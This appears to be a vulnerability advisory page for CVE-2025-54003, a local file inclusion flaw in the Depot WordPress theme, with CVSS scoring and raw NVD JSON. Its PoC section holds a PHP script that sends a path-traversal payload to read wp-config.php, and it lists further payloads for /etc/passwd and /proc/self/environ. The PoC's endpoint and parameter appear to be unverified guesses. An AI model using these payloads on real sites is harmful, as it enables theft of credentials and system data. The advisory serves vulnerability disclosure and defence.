Security Vulnerability Report
中文
CVE-2025-54003 CVSS 8.1 HIGH

CVE-2025-54003

Published: 2026-01-22 17:15:58
Last Modified: 2026-04-27 16:16:28

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Depot depot allows PHP Local File Inclusion.This issue affects Depot: from n/a through <= 1.16.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Depot Theme <= 1.16

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-54003 PoC - WordPress Depot Theme Local File Inclusion * Author: Security Research Team * Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-54003 */ // Basic LFI PoC - Read wp-config.php // Target: WordPress site using Depot theme <= 1.16 $target = 'http://target-site.com'; $endpoint = '/wp-content/themes/depot/mkd/'; // Payload to read wp-config.php $payload = '../../../wp-config.php'; $url = $target . $endpoint . '?file=' . urlencode($payload); echo "[*] CVE-2025-54003 PoC\n"; echo "[*] Target: $target\n"; echo "[*] Attempting to read wp-config.php\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode == 200 && strpos($response, 'DB_NAME') !== false) { echo "[+] Success! wp-config.php contents leaked\n"; echo $response; } else { echo "[-] Failed or target not vulnerable\n"; } // Alternative payloads: // ../../../etc/passwd // ../../../proc/self/environ // ../../../wp-includes/functions.php ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54003", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:15:58.057", "lastModified": "2026-04-27T16:16:28.233", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Depot depot allows PHP Local File Inclusion.This issue affects Depot: from n/a through <= 1.16."}, {"lang": "es", "value": "Control inadecuado del nombre de fichero para la declaración Include/Require en el programa PHP, vulnerabilidad de ('Inclusión Remota de Ficheros PHP') en Mikado-Themes Depot depot permite la Inclusión Local de Ficheros PHP. Este problema afecta a Depot: desde n/a hasta &lt;= 1.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/depot/vulnerability/wordpress-depot-theme-1-16-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}